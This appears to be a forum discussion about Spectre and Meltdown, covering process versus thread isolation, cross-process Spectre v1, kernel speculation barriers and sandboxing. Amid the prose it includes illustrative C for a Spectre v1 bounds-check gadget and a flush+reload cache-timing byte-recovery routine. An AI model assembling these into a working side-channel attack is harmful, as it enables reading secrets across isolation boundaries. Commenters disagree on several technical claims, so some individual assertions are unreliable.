So we'll need to have non-speculative execution for cloud CPUs and stronger efforts to keep untrusted code off our high performance CPUs. This may even lead to chips with performance cores and trusted cores.
This isn't a facetious question. A thread is just, at its core, a process that shares memory with another process. (In fact, this is how threads are implemented on Linux.) But all, or virtually all, processes also share memory with other processes. Text pages of DLLs are shared between processes. Browser processes have shared memory buffers, needed for graphics among other things.
What separates processes that share memory from threads that share memory regarding Spectre? Is it the TLB flush when switching between processes that doesn't occur between threads? Or something else?
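(For concreteness, here's a minimal, hypothetical sketch of what "a thread is just a process that shares memory" looks like at the syscall level on Linux; clone() with CLONE_VM is roughly what pthread_create() does under the hood, while dropping CLONE_VM gives you an ordinary fork-like child. Names and error handling are simplified, this isn't production code.)

```c
/* Sketch: on Linux a "thread" is created with clone() plus CLONE_VM, i.e. a
 * new schedulable task that shares the caller's address space. Drop CLONE_VM
 * and you get an ordinary child process with its own copy of memory. */
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

static int shared_value = 0;

static int worker(void *arg)
{
    (void)arg;
    shared_value = 42;   /* visible to the parent only because CLONE_VM shares memory */
    return 0;
}

int main(void)
{
    const size_t stack_size = 64 * 1024;
    char *stack = malloc(stack_size);
    if (!stack)
        return 1;

    /* CLONE_VM: share the address space -- roughly what pthread_create() does. */
    pid_t child = clone(worker, stack + stack_size, CLONE_VM | SIGCHLD, NULL);
    if (child < 0)
        return 1;

    waitpid(child, NULL, 0);
    printf("shared_value = %d\n", shared_value);   /* prints 42 */
    free(stack);
    return 0;
}
```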
For Spectre v1 and v2, right now (on existing hardware), mostly nothing separates threads from processes. In the future, process isolation is a good candidate for designing hardware + system software such that different processes are isolated (via partitioning the caches, etc.).
You probably still want threads within a process to share cache hits.
In terms of the possibility of exploit, as I understand it, there isn't at this point any isolation between processes.
In terms of the ease of exploit, being able to run untrusted code in the same process as the victim helps quite a bit. Otherwise, you have to find a gadget (i.e. qualifying bounds check for v1, indirect branch for v2) in the victim process that you can exploit from the attacker process. Possible, but quite a bit harder than making your own gadget.
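To make "gadget" concrete, here is a hedged sketch of the classic v1 pattern, modeled on the shape used in the original Spectre paper; the names and sizes are made up for illustration. The point is a bounds check followed by a dependent load whose address depends on the out-of-bounds value.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical victim code containing a Spectre v1 "gadget":
 * a bounds check followed by an attacker-influenced, data-dependent load.
 * If the branch predictor has been trained to predict "in bounds", the CPU
 * may speculatively read array1[x] for an out-of-range x and then touch a
 * cache line of probe[] selected by that secret byte. The architectural
 * result is discarded, but the cache footprint remains measurable. */
size_t  array1_size = 16;
uint8_t array1[16];
uint8_t probe[256 * 4096];   /* one page per possible byte value */
uint8_t temp;                /* keeps the loads from being optimized away */

void victim(size_t x)
{
    if (x < array1_size) {                  /* the bounds check that gets mispredicted */
        uint8_t secret = array1[x];         /* speculative out-of-bounds read */
        temp &= probe[secret * 4096];       /* secret-dependent cache-line touch */
    }
}
```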
This all ignores the forward-looking reasons process isolation is a good idea. I can't keep track of the latest mitigations in Linux, but pretty much all of them only help between processes, by flushing various hardware data structures. And hopefully someday we will have hardware actually designed to restore the guarantees of isolation between processes.
I'm pretty sure this is accurate, but I'm just a random guy on the internet so don't trust my word for it too much.
Since process boundaries are enforced by not mapping any RAM the process can't use^*, they don't get violated by Spectre v1. If you have two threads which only share part of their address space, the unshared part is protected. Any executable or library mapped into multiple processes is readable from any of them.
^*: With modern CPUs, multiple processes can be mapped in simultaneously using ASIDs; however, this doesn't matter, because they work as they should and properly isolate the processes. You can just assume the model "only one process is mapped at a time".
Are you sure that works? As I understand it, the issue with Spectre is the branch predictor, not the memory mappings. The reason why process isolation works is that branch prediction gets reset on context switch (or that this will happen on newer generations of hardware in the future).
The issue is that speculation allows bypassing software-enforced bounds checks, but, discounting Meltdown, the hope is that hardware-enforced memory protections still hold.
I thought this wasn't possible with ASLR'd relocations all over the place in the text?
It's worth noting that no existing or announced common hardware is "properly designed" according to this condition. Even the "fixed" Intel hardware that's been announced is still vulnerable to spectre v1 across process boundaries.
AMD Zen is.
Spectre v1 (bounds check bypass) only works inside processes. All it allows you to do is to read any memory location currently mapped into your address space, and so it gives anything that can execute code complete read access to the address space of the process it's running in. On Intel CPUs, this also allows reading the kernel address space, unless KPTI is used. Eventually, the ability to read kernel memory will be removed, and so KPTI becomes unnecessary.
On all AMD post-BD CPUs, Spectre v1 cannot be used to read the kernel address space.
All the rest of Spectre (and Meltdown) can eventually be fixed, but it is effectively impossible to make a CPU that is both fast and doesn't exhibit Spectre v1.
I don't think this is true. If it is, why did Linux add speculation barriers to bounds checks in the kernel?
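(For context, the barriers in question follow roughly this pattern. This is a simplified user-space re-creation of the idea, not the kernel's actual array_index_nospec() implementation: instead of trusting the branch, the index is clamped with branchless arithmetic so that even a mispredicted bounds check can't speculatively index past the array. The names here are made up; it also assumes arithmetic right shift of signed values, which holds on mainstream compilers.)

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch of the idea behind speculation barriers on bounds checks: compute an
 * all-ones mask when idx < size and an all-zeros mask otherwise, without a
 * branch, and AND it into the index before the array access. */
static inline size_t clamp_index_nospec(size_t idx, size_t size)
{
    /* idx - size underflows (top bit set) exactly when idx < size, so the
     * arithmetic right shift yields ~0 (keep idx) or 0 (clamp to 0). */
    size_t mask = (size_t)((intptr_t)(idx - size) >> (sizeof(intptr_t) * 8 - 1));
    return idx & mask;
}

uint8_t table[256];

uint8_t bounded_read(size_t idx)
{
    if (idx < sizeof(table))                              /* the normal bounds check */
        return table[clamp_index_nospec(idx, sizeof(table))];
    return 0;
}
```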
I was in a discussion of this last week on another thread - see my previous comments for why I think spectre v1 has impact across processes.
I think you were having that discussion with me.
So, I went and read the whole of the lkml threads you linked, and if I understood correctly, regarding Spectre v1, the kernel is only expected to be vulnerable to BPF-based attacks or similar. As far as I understand, the speculation barriers are used to protect arrays directly accessible by BPF programs.
There is a mention of out-of-process attacks against other userspace programs, but no details.
I'm ready to admit that, by carefully crafting inputs, it might be theoretically possible to attack some exploitable branches, but the big deal with Spectre is the high bandwidth that can be attained by directly running code in-process.
Do you have a pointer to any description of an even remotely practical out-of-process Spectre v1 attack that doesn't involve executing code in-process? Repurposing an interface that is not meant to be used to run code (i.e. build your own VM) is fair game.
> If you read the papers you need a very specific construct in order to not only cause a speculative load of an address you choose but also to then manage to cause a second operation that in some way reveals bits of data or allows you to ask questions.

> BPF allows you to construct those sequences relatively easily and it's the one case where a user space application can fairly easily place code it wants to execute in the kernel. Without BPF you have to find the right construct in the kernel, prime all the right predictions and measure the result without getting killed off. There are places you can do that but they are not so easy and we don't (at this point) think there are that many.

> The same situation occurs in user space with interpreters and JITs, hence [such an environment] is particularly vulnerable to versions of this specific attack because the attacker gets to create the code pattern rather than have to find it.
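(To illustrate the "second operation that in some way reveals bits of data" part: after the speculative, secret-dependent touch of a probe array, the attacker times accesses to each slot and takes the fastest one as the leaked byte. A hedged sketch, using a made-up probe[] layout and x86 intrinsics; a real attack repeats this many times and cleans up the noise statistically.)

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Hypothetical probe array: one page per possible byte value, reachable by
 * whatever code performs the secret-dependent touch. */
uint8_t probe[256 * 4096];

/* Flush every slot out of the cache before triggering the gadget. */
static void flush_probe(void)
{
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * 4096]);
    _mm_mfence();
}

/* Time a single access; a slot that was touched speculatively reloads fast. */
static uint64_t time_access(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

/* After the gadget has run, the fastest slot is (probably) the leaked byte. */
static int recover_byte(void)
{
    int best = -1;
    uint64_t best_time = UINT64_MAX;
    for (int i = 0; i < 256; i++) {
        uint64_t t = time_access(&probe[i * 4096]);
        if (t < best_time) { best_time = t; best = i; }
    }
    return best;
}
```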
> big deal with spectre is the high bandwidth that can be attained by directly running code in process
That depends on your perspective. If you are an OS developer who strives to guarantee process isolation, then it is a pretty big deal that Spectre v1 allows you to read memory from the kernel or from other processes, even if it might be tricky to do so. If you write a JS JIT, then yeah, you are probably most concerned about the single-process case.
> remotely practical
IMO, most Spectre attacks are not remotely practical. No, I don't have a pointer. The only actual demonstration of Spectre I've seen is the one included with the original paper (single process).
But then things moved on: the standard way of adding more cache shared between multiple cores was lapped up, and later on we found a design flaw that echoed back across a decade or more of these multi-core CPUs.
Though in fairness, and to put some context on all this: CPU design is more complex than writing tax law, yet loopholes in tax law appear and are exploited all the time by large corporations. Whilst the comparison is not ideal, and some would say unfair, it does highlight that nothing is perfect, and what we may class as perfect today (or darn close) could very well be classed as Swiss cheese in the future. It comes down to how far away that future is.
After all, we still use encryption that we have (on paper) shown to be breakable by future quantum computers!
But in a world that was aware of Y2K decades before the event, the tendency of business to push everything to the last minute for profit will always be a factor in advancements. After all, if CPU cores had isolated caches instead of shared ones, that would mitigate so many of these issues, yet it would cost more to make, and most consumers would not appreciate the extra cost for what is, to them, little value over the cheaper solution. That's business for you, and CPUs are made for profit.
That's why I said we need trusted cores - i.e. ones that don't implement speculative execution or share cache with other cores. Untrusted code needs to be run in physical isolation, not just virtual isolation.
Perhaps we just need to have a more restricted idea about what untrusted code is allowed to do.
E.g., if you do Haskell and just verify that the function you are running is not in the IO monad, you might miss some usage of unsafePerformIO. Even if you check their code, if you let them specify dependencies they might manage to sneak a buggy use of unsafePerformIO into a library they submitted to Hackage.
Plus, your restriction is essentially: no clock, no contact with the outside world, no threading, and a carefully considered interface to the host program to prevent time leaks.
For many use cases, this is not workable.
Disallowing direct access to the outside world is a big restriction, but it may be that a lot of the things you'd want to do inside a sandboxed application that aren't safe could be delegated to trusted code through an appropriate interface.
Threading isn't necessarily a problem; the Haskell Par monad for instance should be fine as there is no program-visible way to know which of two sub-tasks executed in parallel finished first.
Presumably, this could be fixed easily by using the phantom type trick (same as ST) but it would make the type signatures ugly and possibly break existing code. (Maybe there's a more modern alternative to phantom types?) So, yeah, you might not want to use the Par monad as it's currently implemented in ghc as your secure parallel sandbox.
The online docs suggest using lvish if you want a safer Par monad interface, which I'm not familiar with (though the lvish docs say that it's not referentially transparent if you cheat and use Eq or Ord instances that lie).
The general idea seems sound, though -- it should be possible to have parallelism in a sandbox environment without allowing the sandboxed program to conditionally execute code based on which of several threads finished some task first.
umm, "on today's hardware"
Yes it would.
>> That would allow for a whole new class of bugs.
I think it's necessary, but not easy.
Actually what I think is necessary is for people to stop running code from random places - or even common places. Google could work without running stuff on my machine.
Pick two: performance, safety, convenience.
I've wondered if the solution is more, simpler cores. We concentrate on smaller, faster cores, and the programming to utilize them better. Perhaps advances in memory architectures as well. Hardware isn't my specialty, so I'm just brainstorming here.
Perhaps this is where ARM and even RISC-V based systems can step in.
But I'm a software guy, so what do I know? I just know I'd feel more comfortable with systems based on simpler CPUs that simply cannot be exploited by the recently discovered side-channel attacks, rather than playing whack-a-mole with patches and trying to reason about when it might be safe to use CPUs with these optimizations.
A few things: ARM and RISC-V definitely have SpecEx baked in (though on RISC-V you can choose not to include the SpecEx module). There are interesting alternatives to SpecEx. DSPs use delay slots, and I've seen delay slots used quite well in a general-purpose CPU. Getting high instruction saturation on a CPU with delay slots is a "hard compiler problem", but I have a few things to say about that:
Despite jokes about "better compilers", compilers are getting better (e.g. polyhedral optimization). One way to think of OOOEx/SpecEx is that it's figuratively the CPU JITting your code on the fly. The most popular programming language JITs aggressively anyway, so one wonders if there isn't some duplication of effort going on.
Furthermore, the most popular programming language isn't exactly the most performant in terms of raw power, and it's pretty clear that in our current ecosystem just pushing operations through the FPU (which is what x86 optimizes for) isn't necessarily the most important thing in the world; uptime, reliability, fault tolerance, safe parallelization, distribution, and power conservation might be more important moving forward.
HM, oops, apparently RISC-V has OOOEx, not SpecEx.
RISC-V/ARM are specifications of instruction sets, for which there exists an enormous domain of possible implementations. Spectre/Meltdown are not inherent features of instruction set architectures; they are emergent properties of certain implementations of those architectures.
For example, the BOOM implementation of RISC-V does out of order execution. The Rocket chip implementation does not. Both implement the RISC-V architecture.
I'm not replying to you specifically. But I see this sort of thing on HN all the time and I feel like it's an important distinction to make.
The compiler has to make static decisions. The hardware knows what is actually happening. There is an inherent information asymmetry at work that a "sufficiently smart" compiler seems unlikely to overcome.
My intuition says software can't beat the speed of a superscalar OOO CPU any more than a GP CPU can beat a roughly equivalent DSP for algorithms suited to the DSP, but I have no proof of that.
I'll also note that we've been promised "smarter compilers" for decades. Intel has tried that route several times. No one has ever made it work.
Pretty sure I mentioned JITting in my comment.
> My intuition says software can't beat the speed of a superscalar OOO CPU any more
How good is good enough? I mean, we have distributed TensorFlow, which is basically on-the-fly compilation that can reorganize your computational graph around nodes with GPUs separated by network latency, or Julia, where you can drop in a GPUArray as a datatype and move computation to the GPU without changing your code.
If we go to something a bit more baroque, Java is within 1.5x of C/C++ these days.
Could you hand roll a better solution? Probably. Would it be worth it? Doubtful.
On the contrary, the "many wimpy cores" approach has been very successful on GPUs (and other vector processors such as TPUs, etc.) What it hasn't been successful at is running existing software unmodified.
The best solution (the one we use today, in fact) seems to be a hybrid approach. We have a few powerful cores to run sequential code and many weaker units (often vector units; e.g. GPUs and SIMD) to run parallel code. Not all algorithms can be parallelized, so we'll likely always need a few fast sequential cores. But a lot of code can.
Trying to build large-scale quantum computers could lead to styles of optimization that provably don't have side-channel issues.
Also, many of these exploits require running native code to really even be possible, and a JIT offers a large degree of protection. On most of the machines I use, if you are already able to run native code, the battle has already been lost.
I think the security community can sometimes have Chicken Little syndrome. I most definitely wouldn't want performance-enhancing techniques that might have side-channel vulnerabilities to not be produced or used because they might be exploitable in a use case (e.g., web serving and rendering) that doesn't fit most others (e.g., internal servers).
It's not easy, and many systems are more easily broken into by other means (e.g., unpatched known-vulnerable programs). But people are already demonstrating exploits; it's not theoretical.
Also, modern statistics is pretty amazing at removing noise. Don't make claims about "too much noise" until you've tried them.
> On most of the machines I use, if you are already able to run native code, the battle has already been lost.
Perhaps, but many others are in a different circumstance.
> I think the security community can sometimes have Chicken Little syndrome.
> I most definitely wouldn't want performance enhancing techniques that might have side-channel vulnerabilities to not be produced or used because they might be exploitable in a use case (eg, web serving and rendering) that doesn't fit most others (eg, internal servers).
Understandable, and that may be just fine for your situation. However, most systems try to use least privilege to reduce damage (e.g., if you break into one component, you don't get everything). This attack makes it easier to breach such isolation - so even in that case, you might have reason to be concerned.
The sky is not falling, at least not today. But there are reasons to be concerned.
1. This might be a vulnerability in theory, but there's no PoC.
2. Well, it's just a PoC; no one has actually weaponized this.
3. Sure, someone weaponized this, but it is very difficult to pull off.
4. Oh, the script-kiddie toolkits can build exploits for this automatically. Who could have seen it coming?!
(Step #2 is probably where the various governmental spying agencies start deploying the exploit in targeted ways)
Perhaps this time things are different but it seems unlikely.
Everybody keeps saying that the PoC shows it is possible and that a real-world exploit is easy after that. But Spectre has been around for a year now, and nobody has even come close to making a working exploit that didn't require some large leaps of faith.
And every time you bring this up, you get downvoted into the floor on HN. I get it. Spectre is very cool, almost magical, but coolness doesn't make it any more likely to work.